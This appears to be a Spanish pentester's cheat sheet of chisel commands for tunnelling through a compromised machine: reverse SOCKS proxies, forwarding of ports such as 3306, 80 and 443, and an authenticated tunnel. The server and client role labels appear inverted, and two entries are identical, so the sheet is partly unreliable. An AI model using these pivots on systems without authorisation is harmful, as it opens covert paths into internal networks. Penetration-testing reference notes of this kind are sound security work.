▶ Servidor (Ejecutar en máquina comprometida):
  ./chisel server -p 8000 --reverse

▶ Cliente (Conectar desde máquina atacante):
  ./chisel client $IP:8000 R:socks

▶ Port Forwarding (Redirigir puerto específico):
  ./chisel client $IP:8000 R:3306:localhost:3306

▶ Reverse Port Forwarding (Redirigir puerto remoto a local):
  ./chisel client $IP:8000 R:8001:127.0.0.1:8001

▶ Túnel SOCKS5 (Crear proxy SOCKS5):
  ./chisel client $IP:8000 R:socks

▶ Múltiples Túneles (Redirigir varios puertos):
  ./chisel client $IP:8000 R:80:localhost:80 R:443:localhost:443

▶ Túnel con Autenticación (Usar clave):
  ./chisel client --auth user:pass $IP:8000 R:socks
